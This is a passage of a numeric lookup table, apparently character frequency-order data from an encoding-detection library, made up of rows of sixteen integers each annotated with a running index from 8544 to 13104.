8781,8782,8783,8784,8785,8786,8787,8788,4878,8789,4879,8790,8791,8792,4880,8793, # 8544
8794,8795,8796,8797,8798,8799,8800,8801,4881,8802,8803,8804,8805,8806,8807,8808, # 8560
8809,8810,8811,8812,8813,8814,8815,3957,8816,8817,8818,8819,8820,8821,8822,8823, # 8576
8824,8825,8826,8827,8828,8829,8830,8831,8832,8833,8834,8835,8836,8837,8838,8839, # 8592
8840,8841,8842,8843,8844,8845,8846,8847,4882,8848,8849,8850,8851,8852,8853,8854, # 8608
8855,8856,8857,8858,8859,8860,8861,8862,8863,8864,8865,8866,8867,8868,8869,8870, # 8624
8871,8872,8873,8874,8875,8876,8877,8878,8879,8880,8881,8882,8883,8884,3202,8885, # 8640
8886,8887,8888,8889,8890,8891,8892,8893,8894,8895,8896,8897,8898,8899,8900,8901, # 8656
8902,8903,8904,8905,8906,8907,8908,8909,8910,8911,8912,8913,8914,8915,8916,8917, # 8672
8918,8919,8920,8921,8922,8923,8924,4465,8925,8926,8927,8928,8929,8930,8931,8932, # 8688
4883,8933,8934,8935,8936,8937,8938,8939,8940,8941,8942,8943,2214,8944,8945,8946, # 8704
8947,8948,8949,8950,8951,8952,8953,8954,8955,8956,8957,8958,8959,8960,8961,8962, # 8720
8963,8964,8965,4884,8966,8967,8968,8969,8970,8971,8972,8973,8974,8975,8976,8977, # 8736
8978,8979,8980,8981,8982,8983,8984,8985,8986,8987,8988,8989,8990,8991,8992,4885, # 8752
8993,8994,8995,8996,8997,8998,8999,9000,9001,9002,9003,9004,9005,9006,9007,9008, # 8768
9009,9010,9011,9012,9013,9014,9015,9016,9017,9018,9019,9020,9021,4182,9022,9023, # 8784
9024,9025,9026,9027,9028,9029,9030,9031,9032,9033,9034,9035,9036,9037,9038,9039, # 8800
9040,9041,9042,9043,9044,9045,9046,9047,9048,9049,9050,9051,9052,9053,9054,9055, # 8816
9056,9057,9058,9059,9060,9061,9062,9063,4886,9064,9065,9066,9067,9068,9069,4887, # 8832
9070,9071,9072,9073,9074,9075,9076,9077,9078,9079,9080,9081,9082,9083,9084,9085, # 8848
9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9101, # 8864
9102,9103,9104,9105,9106,9107,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117, # 8880
9118,9119,9120,9121,9122,9123,9124,9125,9126,9127,9128,9129,9130,9131,9132,9133, # 8896
9134,9135,9136,9137,9138,9139,9140,9141,3958,9142,9143,9144,9145,9146,9147,9148, # 8912
9149,9150,9151,4888,9152,9153,9154,9155,9156,9157,9158,9159,9160,9161,9162,9163, # 8928
9164,9165,9166,9167,9168,9169,9170,9171,9172,9173,9174,9175,4889,9176,9177,9178, # 8944
9179,9180,9181,9182,9183,9184,9185,9186,9187,9188,9189,9190,9191,9192,9193,9194, # 8960
9195,9196,9197,9198,9199,9200,9201,9202,9203,4890,9204,9205,9206,9207,9208,9209, # 8976
9210,9211,9212,9213,9214,9215,9216,9217,9218,9219,9220,9221,9222,4466,9223,9224, # 8992
9225,9226,9227,9228,9229,9230,9231,9232,9233,9234,9235,9236,9237,9238,9239,9240, # 9008
9241,9242,9243,9244,9245,4891,9246,9247,9248,9249,9250,9251,9252,9253,9254,9255, # 9024
9256,9257,4892,9258,9259,9260,9261,4893,4894,9262,9263,9264,9265,9266,9267,9268, # 9040
9269,9270,9271,9272,9273,4467,9274,9275,9276,9277,9278,9279,9280,9281,9282,9283, # 9056
9284,9285,3673,9286,9287,9288,9289,9290,9291,9292,9293,9294,9295,9296,9297,9298, # 9072
9299,9300,9301,9302,9303,9304,9305,9306,9307,9308,9309,9310,9311,9312,9313,9314, # 9088
9315,9316,9317,9318,9319,9320,9321,9322,4895,9323,9324,9325,9326,9327,9328,9329, # 9104
9330,9331,9332,9333,9334,9335,9336,9337,9338,9339,9340,9341,9342,9343,9344,9345, # 9120
9346,9347,4468,9348,9349,9350,9351,9352,9353,9354,9355,9356,9357,9358,9359,9360, # 9136
9361,9362,9363,9364,9365,9366,9367,9368,9369,9370,9371,9372,9373,4896,9374,4469, # 9152
9375,9376,9377,9378,9379,4897,9380,9381,9382,9383,9384,9385,9386,9387,9388,9389, # 9168
9390,9391,9392,9393,9394,9395,9396,9397,9398,9399,9400,9401,9402,9403,9404,9405, # 9184
9406,4470,9407,2751,9408,9409,3674,3552,9410,9411,9412,9413,9414,9415,9416,9417, # 9200
9418,9419,9420,9421,4898,9422,9423,9424,9425,9426,9427,9428,9429,3959,9430,9431, # 9216
9432,9433,9434,9435,9436,4471,9437,9438,9439,9440,9441,9442,9443,9444,9445,9446, # 9232
9447,9448,9449,9450,3348,9451,9452,9453,9454,9455,9456,9457,9458,9459,9460,9461, # 9248
9462,9463,9464,9465,9466,9467,9468,9469,9470,9471,9472,4899,9473,9474,9475,9476, # 9264
9477,4900,9478,9479,9480,9481,9482,9483,9484,9485,9486,9487,9488,3349,9489,9490, # 9280
9491,9492,9493,9494,9495,9496,9497,9498,9499,9500,9501,9502,9503,9504,9505,9506, # 9296
9507,9508,9509,9510,9511,9512,9513,9514,9515,9516,9517,9518,9519,9520,4901,9521, # 9312
9522,9523,9524,9525,9526,4902,9527,9528,9529,9530,9531,9532,9533,9534,9535,9536, # 9328
9537,9538,9539,9540,9541,9542,9543,9544,9545,9546,9547,9548,9549,9550,9551,9552, # 9344
9553,9554,9555,9556,9557,9558,9559,9560,9561,9562,9563,9564,9565,9566,9567,9568, # 9360
9569,9570,9571,9572,9573,9574,9575,9576,9577,9578,9579,9580,9581,9582,9583,9584, # 9376
3805,9585,9586,9587,9588,9589,9590,9591,9592,9593,9594,9595,9596,9597,9598,9599, # 9392
9600,9601,9602,4903,9603,9604,9605,9606,9607,4904,9608,9609,9610,9611,9612,9613, # 9408
9614,4905,9615,9616,9617,9618,9619,9620,9621,9622,9623,9624,9625,9626,9627,9628, # 9424
9629,9630,9631,9632,4906,9633,9634,9635,9636,9637,9638,9639,9640,9641,9642,9643, # 9440
4907,9644,9645,9646,9647,9648,9649,9650,9651,9652,9653,9654,9655,9656,9657,9658, # 9456
9659,9660,9661,9662,9663,9664,9665,9666,9667,9668,9669,9670,9671,9672,4183,9673, # 9472
9674,9675,9676,9677,4908,9678,9679,9680,9681,4909,9682,9683,9684,9685,9686,9687, # 9488
9688,9689,9690,4910,9691,9692,9693,3675,9694,9695,9696,2945,9697,9698,9699,9700, # 9504
9701,9702,9703,9704,9705,4911,9706,9707,9708,9709,9710,9711,9712,9713,9714,9715, # 9520
9716,9717,9718,9719,9720,9721,9722,9723,9724,9725,9726,9727,9728,9729,9730,9731, # 9536
9732,9733,9734,9735,4912,9736,9737,9738,9739,9740,4913,9741,9742,9743,9744,9745, # 9552
9746,9747,9748,9749,9750,9751,9752,9753,9754,9755,9756,9757,9758,4914,9759,9760, # 9568
9761,9762,9763,9764,9765,9766,9767,9768,9769,9770,9771,9772,9773,9774,9775,9776, # 9584
9777,9778,9779,9780,9781,9782,4915,9783,9784,9785,9786,9787,9788,9789,9790,9791, # 9600
9792,9793,4916,9794,9795,9796,9797,9798,9799,9800,9801,9802,9803,9804,9805,9806, # 9616
9807,9808,9809,9810,9811,9812,9813,9814,9815,9816,9817,9818,9819,9820,9821,9822, # 9632
9823,9824,9825,9826,9827,9828,9829,9830,9831,9832,9833,9834,9835,9836,9837,9838, # 9648
9839,9840,9841,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852,9853,9854, # 9664
9855,9856,9857,9858,9859,9860,9861,9862,9863,9864,9865,9866,9867,9868,4917,9869, # 9680
9870,9871,9872,9873,9874,9875,9876,9877,9878,9879,9880,9881,9882,9883,9884,9885, # 9696
9886,9887,9888,9889,9890,9891,9892,4472,9893,9894,9895,9896,9897,3806,9898,9899, # 9712
9900,9901,9902,9903,9904,9905,9906,9907,9908,9909,9910,9911,9912,9913,9914,4918, # 9728
9915,9916,9917,4919,9918,9919,9920,9921,4184,9922,9923,9924,9925,9926,9927,9928, # 9744
9929,9930,9931,9932,9933,9934,9935,9936,9937,9938,9939,9940,9941,9942,9943,9944, # 9760
9945,9946,4920,9947,9948,9949,9950,9951,9952,9953,9954,9955,4185,9956,9957,9958, # 9776
9959,9960,9961,9962,9963,9964,9965,4921,9966,9967,9968,4473,9969,9970,9971,9972, # 9792
9973,9974,9975,9976,9977,4474,9978,9979,9980,9981,9982,9983,9984,9985,9986,9987, # 9808
9988,9989,9990,9991,9992,9993,9994,9995,9996,9997,9998,9999,10000,10001,10002,10003, # 9824
10004,10005,10006,10007,10008,10009,10010,10011,10012,10013,10014,10015,10016,10017,10018,10019, # 9840
10020,10021,4922,10022,4923,10023,10024,10025,10026,10027,10028,10029,10030,10031,10032,10033, # 9856
10034,10035,10036,10037,10038,10039,10040,10041,10042,10043,10044,10045,10046,10047,10048,4924, # 9872
10049,10050,10051,10052,10053,10054,10055,10056,10057,10058,10059,10060,10061,10062,10063,10064, # 9888
10065,10066,10067,10068,10069,10070,10071,10072,10073,10074,10075,10076,10077,10078,10079,10080, # 9904
10081,10082,10083,10084,10085,10086,10087,4475,10088,10089,10090,10091,10092,10093,10094,10095, # 9920
10096,10097,4476,10098,10099,10100,10101,10102,10103,10104,10105,10106,10107,10108,10109,10110, # 9936
10111,2174,10112,10113,10114,10115,10116,10117,10118,10119,10120,10121,10122,10123,10124,10125, # 9952
10126,10127,10128,10129,10130,10131,10132,10133,10134,10135,10136,10137,10138,10139,10140,3807, # 9968
4186,4925,10141,10142,10143,10144,10145,10146,10147,4477,4187,10148,10149,10150,10151,10152, # 9984
10153,4188,10154,10155,10156,10157,10158,10159,10160,10161,4926,10162,10163,10164,10165,10166, #10000
10167,10168,10169,10170,10171,10172,10173,10174,10175,10176,10177,10178,10179,10180,10181,10182, #10016
10183,10184,10185,10186,10187,10188,10189,10190,10191,10192,3203,10193,10194,10195,10196,10197, #10032
10198,10199,10200,4478,10201,10202,10203,10204,4479,10205,10206,10207,10208,10209,10210,10211, #10048
10212,10213,10214,10215,10216,10217,10218,10219,10220,10221,10222,10223,10224,10225,10226,10227, #10064
10228,10229,10230,10231,10232,10233,10234,4927,10235,10236,10237,10238,10239,10240,10241,10242, #10080
10243,10244,10245,10246,10247,10248,10249,10250,10251,10252,10253,10254,10255,10256,10257,10258, #10096
10259,10260,10261,10262,10263,10264,10265,10266,10267,10268,10269,10270,10271,10272,10273,4480, #10112
4928,4929,10274,10275,10276,10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287, #10128
10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298,10299,10300,10301,10302,10303, #10144
10304,10305,10306,10307,10308,10309,10310,10311,10312,10313,10314,10315,10316,10317,10318,10319, #10160
10320,10321,10322,10323,10324,10325,10326,10327,10328,10329,10330,10331,10332,10333,10334,4930, #10176
10335,10336,10337,10338,10339,10340,10341,10342,4931,10343,10344,10345,10346,10347,10348,10349, #10192
10350,10351,10352,10353,10354,10355,3088,10356,2786,10357,10358,10359,10360,4189,10361,10362, #10208
10363,10364,10365,10366,10367,10368,10369,10370,10371,10372,10373,10374,10375,4932,10376,10377, #10224
10378,10379,10380,10381,10382,10383,10384,10385,10386,10387,10388,10389,10390,10391,10392,4933, #10240
10393,10394,10395,4934,10396,10397,10398,10399,10400,10401,10402,10403,10404,10405,10406,10407, #10256
10408,10409,10410,10411,10412,3446,10413,10414,10415,10416,10417,10418,10419,10420,10421,10422, #10272
10423,4935,10424,10425,10426,10427,10428,10429,10430,4936,10431,10432,10433,10434,10435,10436, #10288
10437,10438,10439,10440,10441,10442,10443,4937,10444,10445,10446,10447,4481,10448,10449,10450, #10304
10451,10452,10453,10454,10455,10456,10457,10458,10459,10460,10461,10462,10463,10464,10465,10466, #10320
10467,10468,10469,10470,10471,10472,10473,10474,10475,10476,10477,10478,10479,10480,10481,10482, #10336
10483,10484,10485,10486,10487,10488,10489,10490,10491,10492,10493,10494,10495,10496,10497,10498, #10352
10499,10500,10501,10502,10503,10504,10505,4938,10506,10507,10508,10509,10510,2552,10511,10512, #10368
10513,10514,10515,10516,3447,10517,10518,10519,10520,10521,10522,10523,10524,10525,10526,10527, #10384
10528,10529,10530,10531,10532,10533,10534,10535,10536,10537,10538,10539,10540,10541,10542,10543, #10400
4482,10544,4939,10545,10546,10547,10548,10549,10550,10551,10552,10553,10554,10555,10556,10557, #10416
10558,10559,10560,10561,10562,10563,10564,10565,10566,10567,3676,4483,10568,10569,10570,10571, #10432
10572,3448,10573,10574,10575,10576,10577,10578,10579,10580,10581,10582,10583,10584,10585,10586, #10448
10587,10588,10589,10590,10591,10592,10593,10594,10595,10596,10597,10598,10599,10600,10601,10602, #10464
10603,10604,10605,10606,10607,10608,10609,10610,10611,10612,10613,10614,10615,10616,10617,10618, #10480
10619,10620,10621,10622,10623,10624,10625,10626,10627,4484,10628,10629,10630,10631,10632,4940, #10496
10633,10634,10635,10636,10637,10638,10639,10640,10641,10642,10643,10644,10645,10646,10647,10648, #10512
10649,10650,10651,10652,10653,10654,10655,10656,4941,10657,10658,10659,2599,10660,10661,10662, #10528
10663,10664,10665,10666,3089,10667,10668,10669,10670,10671,10672,10673,10674,10675,10676,10677, #10544
10678,10679,10680,4942,10681,10682,10683,10684,10685,10686,10687,10688,10689,10690,10691,10692, #10560
10693,10694,10695,10696,10697,4485,10698,10699,10700,10701,10702,10703,10704,4943,10705,3677, #10576
10706,10707,10708,10709,10710,10711,10712,4944,10713,10714,10715,10716,10717,10718,10719,10720, #10592
10721,10722,10723,10724,10725,10726,10727,10728,4945,10729,10730,10731,10732,10733,10734,10735, #10608
10736,10737,10738,10739,10740,10741,10742,10743,10744,10745,10746,10747,10748,10749,10750,10751, #10624
10752,10753,10754,10755,10756,10757,10758,10759,10760,10761,4946,10762,10763,10764,10765,10766, #10640
10767,4947,4948,10768,10769,10770,10771,10772,10773,10774,10775,10776,10777,10778,10779,10780, #10656
10781,10782,10783,10784,10785,10786,10787,10788,10789,10790,10791,10792,10793,10794,10795,10796, #10672
10797,10798,10799,10800,10801,10802,10803,10804,10805,10806,10807,10808,10809,10810,10811,10812, #10688
10813,10814,10815,10816,10817,10818,10819,10820,10821,10822,10823,10824,10825,10826,10827,10828, #10704
10829,10830,10831,10832,10833,10834,10835,10836,10837,10838,10839,10840,10841,10842,10843,10844, #10720
10845,10846,10847,10848,10849,10850,10851,10852,10853,10854,10855,10856,10857,10858,10859,10860, #10736
10861,10862,10863,10864,10865,10866,10867,10868,10869,10870,10871,10872,10873,10874,10875,10876, #10752
10877,10878,4486,10879,10880,10881,10882,10883,10884,10885,4949,10886,10887,10888,10889,10890, #10768
10891,10892,10893,10894,10895,10896,10897,10898,10899,10900,10901,10902,10903,10904,10905,10906, #10784
10907,10908,10909,10910,10911,10912,10913,10914,10915,10916,10917,10918,10919,4487,10920,10921, #10800
10922,10923,10924,10925,10926,10927,10928,10929,10930,10931,10932,4950,10933,10934,10935,10936, #10816
10937,10938,10939,10940,10941,10942,10943,10944,10945,10946,10947,10948,10949,4488,10950,10951, #10832
10952,10953,10954,10955,10956,10957,10958,10959,4190,10960,10961,10962,10963,10964,10965,10966, #10848
10967,10968,10969,10970,10971,10972,10973,10974,10975,10976,10977,10978,10979,10980,10981,10982, #10864
10983,10984,10985,10986,10987,10988,10989,10990,10991,10992,10993,10994,10995,10996,10997,10998, #10880
10999,11000,11001,11002,11003,11004,11005,11006,3960,11007,11008,11009,11010,11011,11012,11013, #10896
11014,11015,11016,11017,11018,11019,11020,11021,11022,11023,11024,11025,11026,11027,11028,11029, #10912
11030,11031,11032,4951,11033,11034,11035,11036,11037,11038,11039,11040,11041,11042,11043,11044, #10928
11045,11046,11047,4489,11048,11049,11050,11051,4952,11052,11053,11054,11055,11056,11057,11058, #10944
4953,11059,11060,11061,11062,11063,11064,11065,11066,11067,11068,11069,11070,11071,4954,11072, #10960
11073,11074,11075,11076,11077,11078,11079,11080,11081,11082,11083,11084,11085,11086,11087,11088, #10976
11089,11090,11091,11092,11093,11094,11095,11096,11097,11098,11099,11100,11101,11102,11103,11104, #10992
11105,11106,11107,11108,11109,11110,11111,11112,11113,11114,11115,3808,11116,11117,11118,11119, #11008
11120,11121,11122,11123,11124,11125,11126,11127,11128,11129,11130,11131,11132,11133,11134,4955, #11024
11135,11136,11137,11138,11139,11140,11141,11142,11143,11144,11145,11146,11147,11148,11149,11150, #11040
11151,11152,11153,11154,11155,11156,11157,11158,11159,11160,11161,4956,11162,11163,11164,11165, #11056
11166,11167,11168,11169,11170,11171,11172,11173,11174,11175,11176,11177,11178,11179,11180,4957, #11072
11181,11182,11183,11184,11185,11186,4958,11187,11188,11189,11190,11191,11192,11193,11194,11195, #11088
11196,11197,11198,11199,11200,3678,11201,11202,11203,11204,11205,11206,4191,11207,11208,11209, #11104
11210,11211,11212,11213,11214,11215,11216,11217,11218,11219,11220,11221,11222,11223,11224,11225, #11120
11226,11227,11228,11229,11230,11231,11232,11233,11234,11235,11236,11237,11238,11239,11240,11241, #11136
11242,11243,11244,11245,11246,11247,11248,11249,11250,11251,4959,11252,11253,11254,11255,11256, #11152
11257,11258,11259,11260,11261,11262,11263,11264,11265,11266,11267,11268,11269,11270,11271,11272, #11168
11273,11274,11275,11276,11277,11278,11279,11280,11281,11282,11283,11284,11285,11286,11287,11288, #11184
11289,11290,11291,11292,11293,11294,11295,11296,11297,11298,11299,11300,11301,11302,11303,11304, #11200
11305,11306,11307,11308,11309,11310,11311,11312,11313,11314,3679,11315,11316,11317,11318,4490, #11216
11319,11320,11321,11322,11323,11324,11325,11326,11327,11328,11329,11330,11331,11332,11333,11334, #11232
11335,11336,11337,11338,11339,11340,11341,11342,11343,11344,11345,11346,11347,4960,11348,11349, #11248
11350,11351,11352,11353,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365, #11264
11366,11367,11368,11369,11370,11371,11372,11373,11374,11375,11376,11377,3961,4961,11378,11379, #11280
11380,11381,11382,11383,11384,11385,11386,11387,11388,11389,11390,11391,11392,11393,11394,11395, #11296
11396,11397,4192,11398,11399,11400,11401,11402,11403,11404,11405,11406,11407,11408,11409,11410, #11312
11411,4962,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11424,11425, #11328
11426,11427,11428,11429,11430,11431,11432,11433,11434,11435,11436,11437,11438,11439,11440,11441, #11344
11442,11443,11444,11445,11446,11447,11448,11449,11450,11451,11452,11453,11454,11455,11456,11457, #11360
11458,11459,11460,11461,11462,11463,11464,11465,11466,11467,11468,11469,4963,11470,11471,4491, #11376
11472,11473,11474,11475,4964,11476,11477,11478,11479,11480,11481,11482,11483,11484,11485,11486, #11392
11487,11488,11489,11490,11491,11492,4965,11493,11494,11495,11496,11497,11498,11499,11500,11501, #11408
11502,11503,11504,11505,11506,11507,11508,11509,11510,11511,11512,11513,11514,11515,11516,11517, #11424
11518,11519,11520,11521,11522,11523,11524,11525,11526,11527,11528,11529,3962,11530,11531,11532, #11440
11533,11534,11535,11536,11537,11538,11539,11540,11541,11542,11543,11544,11545,11546,11547,11548, #11456
11549,11550,11551,11552,11553,11554,11555,11556,11557,11558,11559,11560,11561,11562,11563,11564, #11472
4193,4194,11565,11566,11567,11568,11569,11570,11571,11572,11573,11574,11575,11576,11577,11578, #11488
11579,11580,11581,11582,11583,11584,11585,11586,11587,11588,11589,11590,11591,4966,4195,11592, #11504
11593,11594,11595,11596,11597,11598,11599,11600,11601,11602,11603,11604,3090,11605,11606,11607, #11520
11608,11609,11610,4967,11611,11612,11613,11614,11615,11616,11617,11618,11619,11620,11621,11622, #11536
11623,11624,11625,11626,11627,11628,11629,11630,11631,11632,11633,11634,11635,11636,11637,11638, #11552
11639,11640,11641,11642,11643,11644,11645,11646,11647,11648,11649,11650,11651,11652,11653,11654, #11568
11655,11656,11657,11658,11659,11660,11661,11662,11663,11664,11665,11666,11667,11668,11669,11670, #11584
11671,11672,11673,11674,4968,11675,11676,11677,11678,11679,11680,11681,11682,11683,11684,11685, #11600
11686,11687,11688,11689,11690,11691,11692,11693,3809,11694,11695,11696,11697,11698,11699,11700, #11616
11701,11702,11703,11704,11705,11706,11707,11708,11709,11710,11711,11712,11713,11714,11715,11716, #11632
11717,11718,3553,11719,11720,11721,11722,11723,11724,11725,11726,11727,11728,11729,11730,4969, #11648
11731,11732,11733,11734,11735,11736,11737,11738,11739,11740,4492,11741,11742,11743,11744,11745, #11664
11746,11747,11748,11749,11750,11751,11752,4970,11753,11754,11755,11756,11757,11758,11759,11760, #11680
11761,11762,11763,11764,11765,11766,11767,11768,11769,11770,11771,11772,11773,11774,11775,11776, #11696
11777,11778,11779,11780,11781,11782,11783,11784,11785,11786,11787,11788,11789,11790,4971,11791, #11712
11792,11793,11794,11795,11796,11797,4972,11798,11799,11800,11801,11802,11803,11804,11805,11806, #11728
11807,11808,11809,11810,4973,11811,11812,11813,11814,11815,11816,11817,11818,11819,11820,11821, #11744
11822,11823,11824,11825,11826,11827,11828,11829,11830,11831,11832,11833,11834,3680,3810,11835, #11760
11836,4974,11837,11838,11839,11840,11841,11842,11843,11844,11845,11846,11847,11848,11849,11850, #11776
11851,11852,11853,11854,11855,11856,11857,11858,11859,11860,11861,11862,11863,11864,11865,11866, #11792
11867,11868,11869,11870,11871,11872,11873,11874,11875,11876,11877,11878,11879,11880,11881,11882, #11808
11883,11884,4493,11885,11886,11887,11888,11889,11890,11891,11892,11893,11894,11895,11896,11897, #11824
11898,11899,11900,11901,11902,11903,11904,11905,11906,11907,11908,11909,11910,11911,11912,11913, #11840
11914,11915,4975,11916,11917,11918,11919,11920,11921,11922,11923,11924,11925,11926,11927,11928, #11856
11929,11930,11931,11932,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11943,11944, #11872
11945,11946,11947,11948,11949,4976,11950,11951,11952,11953,11954,11955,11956,11957,11958,11959, #11888
11960,11961,11962,11963,11964,11965,11966,11967,11968,11969,11970,11971,11972,11973,11974,11975, #11904
11976,11977,11978,11979,11980,11981,11982,11983,11984,11985,11986,11987,4196,11988,11989,11990, #11920
11991,11992,4977,11993,11994,11995,11996,11997,11998,11999,12000,12001,12002,12003,12004,12005, #11936
12006,12007,12008,12009,12010,12011,12012,12013,12014,12015,12016,12017,12018,12019,12020,12021, #11952
12022,12023,12024,12025,12026,12027,12028,12029,12030,12031,12032,12033,12034,12035,12036,12037, #11968
12038,12039,12040,12041,12042,12043,12044,12045,12046,12047,12048,12049,12050,12051,12052,12053, #11984
12054,12055,12056,12057,12058,12059,12060,12061,4978,12062,12063,12064,12065,12066,12067,12068, #12000
12069,12070,12071,12072,12073,12074,12075,12076,12077,12078,12079,12080,12081,12082,12083,12084, #12016
12085,12086,12087,12088,12089,12090,12091,12092,12093,12094,12095,12096,12097,12098,12099,12100, #12032
12101,12102,12103,12104,12105,12106,12107,12108,12109,12110,12111,12112,12113,12114,12115,12116, #12048
12117,12118,12119,12120,12121,12122,12123,4979,12124,12125,12126,12127,12128,4197,12129,12130, #12064
12131,12132,12133,12134,12135,12136,12137,12138,12139,12140,12141,12142,12143,12144,12145,12146, #12080
12147,12148,12149,12150,12151,12152,12153,12154,4980,12155,12156,12157,12158,12159,12160,4494, #12096
12161,12162,12163,12164,3811,12165,12166,12167,12168,12169,4495,12170,12171,4496,12172,12173, #12112
12174,12175,12176,3812,12177,12178,12179,12180,12181,12182,12183,12184,12185,12186,12187,12188, #12128
12189,12190,12191,12192,12193,12194,12195,12196,12197,12198,12199,12200,12201,12202,12203,12204, #12144
12205,12206,12207,12208,12209,12210,12211,12212,12213,12214,12215,12216,12217,12218,12219,12220, #12160
12221,4981,12222,12223,12224,12225,12226,12227,12228,12229,12230,12231,12232,12233,12234,12235, #12176
4982,12236,12237,12238,12239,12240,12241,12242,12243,12244,12245,4983,12246,12247,12248,12249, #12192
4984,12250,12251,12252,12253,12254,12255,12256,12257,12258,12259,12260,12261,12262,12263,12264, #12208
4985,12265,4497,12266,12267,12268,12269,12270,12271,12272,12273,12274,12275,12276,12277,12278, #12224
12279,12280,12281,12282,12283,12284,12285,12286,12287,4986,12288,12289,12290,12291,12292,12293, #12240
12294,12295,12296,2473,12297,12298,12299,12300,12301,12302,12303,12304,12305,12306,12307,12308, #12256
12309,12310,12311,12312,12313,12314,12315,12316,12317,12318,12319,3963,12320,12321,12322,12323, #12272
12324,12325,12326,12327,12328,12329,12330,12331,12332,4987,12333,12334,12335,12336,12337,12338, #12288
12339,12340,12341,12342,12343,12344,12345,12346,12347,12348,12349,12350,12351,12352,12353,12354, #12304
12355,12356,12357,12358,12359,3964,12360,12361,12362,12363,12364,12365,12366,12367,12368,12369, #12320
12370,3965,12371,12372,12373,12374,12375,12376,12377,12378,12379,12380,12381,12382,12383,12384, #12336
12385,12386,12387,12388,12389,12390,12391,12392,12393,12394,12395,12396,12397,12398,12399,12400, #12352
12401,12402,12403,12404,12405,12406,12407,12408,4988,12409,12410,12411,12412,12413,12414,12415, #12368
12416,12417,12418,12419,12420,12421,12422,12423,12424,12425,12426,12427,12428,12429,12430,12431, #12384
12432,12433,12434,12435,12436,12437,12438,3554,12439,12440,12441,12442,12443,12444,12445,12446, #12400
12447,12448,12449,12450,12451,12452,12453,12454,12455,12456,12457,12458,12459,12460,12461,12462, #12416
12463,12464,4989,12465,12466,12467,12468,12469,12470,12471,12472,12473,12474,12475,12476,12477, #12432
12478,12479,12480,4990,12481,12482,12483,12484,12485,12486,12487,12488,12489,4498,12490,12491, #12448
12492,12493,12494,12495,12496,12497,12498,12499,12500,12501,12502,12503,12504,12505,12506,12507, #12464
12508,12509,12510,12511,12512,12513,12514,12515,12516,12517,12518,12519,12520,12521,12522,12523, #12480
12524,12525,12526,12527,12528,12529,12530,12531,12532,12533,12534,12535,12536,12537,12538,12539, #12496
12540,12541,12542,12543,12544,12545,12546,12547,12548,12549,12550,12551,4991,12552,12553,12554, #12512
12555,12556,12557,12558,12559,12560,12561,12562,12563,12564,12565,12566,12567,12568,12569,12570, #12528
12571,12572,12573,12574,12575,12576,12577,12578,3036,12579,12580,12581,12582,12583,3966,12584, #12544
12585,12586,12587,12588,12589,12590,12591,12592,12593,12594,12595,12596,12597,12598,12599,12600, #12560
12601,12602,12603,12604,12605,12606,12607,12608,12609,12610,12611,12612,12613,12614,12615,12616, #12576
12617,12618,12619,12620,12621,12622,12623,12624,12625,12626,12627,12628,12629,12630,12631,12632, #12592
12633,12634,12635,12636,12637,12638,12639,12640,12641,12642,12643,12644,12645,12646,4499,12647, #12608
12648,12649,12650,12651,12652,12653,12654,12655,12656,12657,12658,12659,12660,12661,12662,12663, #12624
12664,12665,12666,12667,12668,12669,12670,12671,12672,12673,12674,12675,12676,12677,12678,12679, #12640
12680,12681,12682,12683,12684,12685,12686,12687,12688,12689,12690,12691,12692,12693,12694,12695, #12656
12696,12697,12698,4992,12699,12700,12701,12702,12703,12704,12705,12706,12707,12708,12709,12710, #12672
12711,12712,12713,12714,12715,12716,12717,12718,12719,12720,12721,12722,12723,12724,12725,12726, #12688
12727,12728,12729,12730,12731,12732,12733,12734,12735,12736,12737,12738,12739,12740,12741,12742, #12704
12743,12744,12745,12746,12747,12748,12749,12750,12751,12752,12753,12754,12755,12756,12757,12758, #12720
12759,12760,12761,12762,12763,12764,12765,12766,12767,12768,12769,12770,12771,12772,12773,12774, #12736
12775,12776,12777,12778,4993,2175,12779,12780,12781,12782,12783,12784,12785,12786,4500,12787, #12752
12788,12789,12790,12791,12792,12793,12794,12795,12796,12797,12798,12799,12800,12801,12802,12803, #12768
12804,12805,12806,12807,12808,12809,12810,12811,12812,12813,12814,12815,12816,12817,12818,12819, #12784
12820,12821,12822,12823,12824,12825,12826,4198,3967,12827,12828,12829,12830,12831,12832,12833, #12800
12834,12835,12836,12837,12838,12839,12840,12841,12842,12843,12844,12845,12846,12847,12848,12849, #12816
12850,12851,12852,12853,12854,12855,12856,12857,12858,12859,12860,12861,4199,12862,12863,12864, #12832
12865,12866,12867,12868,12869,12870,12871,12872,12873,12874,12875,12876,12877,12878,12879,12880, #12848
12881,12882,12883,12884,12885,12886,12887,4501,12888,12889,12890,12891,12892,12893,12894,12895, #12864
12896,12897,12898,12899,12900,12901,12902,12903,12904,12905,12906,12907,12908,12909,12910,12911, #12880
12912,4994,12913,12914,12915,12916,12917,12918,12919,12920,12921,12922,12923,12924,12925,12926, #12896
12927,12928,12929,12930,12931,12932,12933,12934,12935,12936,12937,12938,12939,12940,12941,12942, #12912
12943,12944,12945,12946,12947,12948,12949,12950,12951,12952,12953,12954,12955,12956,1772,12957, #12928
12958,12959,12960,12961,12962,12963,12964,12965,12966,12967,12968,12969,12970,12971,12972,12973, #12944
12974,12975,12976,12977,12978,12979,12980,12981,12982,12983,12984,12985,12986,12987,12988,12989, #12960
12990,12991,12992,12993,12994,12995,12996,12997,4502,12998,4503,12999,13000,13001,13002,13003, #12976
4504,13004,13005,13006,13007,13008,13009,13010,13011,13012,13013,13014,13015,13016,13017,13018, #12992
13019,13020,13021,13022,13023,13024,13025,13026,13027,13028,13029,3449,13030,13031,13032,13033, #13008
13034,13035,13036,13037,13038,13039,13040,13041,13042,13043,13044,13045,13046,13047,13048,13049, #13024
13050,13051,13052,13053,13054,13055,13056,13057,13058,13059,13060,13061,13062,13063,13064,13065, #13040
13066,13067,13068,13069,13070,13071,13072,13073,13074,13075,13076,13077,13078,13079,13080,13081, #13056
13082,13083,13084,13085,13086,13087,13088,13089,13090,13091,13092,13093,13094,13095,13096,13097, #13072
13098,13099,13100,13101,13102,13103,13104,13105,13106,13107,13108,13109,13110,13111,13112,13113, #13088
13114,13115,13116,13117,13118,3968,13119,4995,13120,13121,13122,13123,13124,13125,13126,13127, #13104
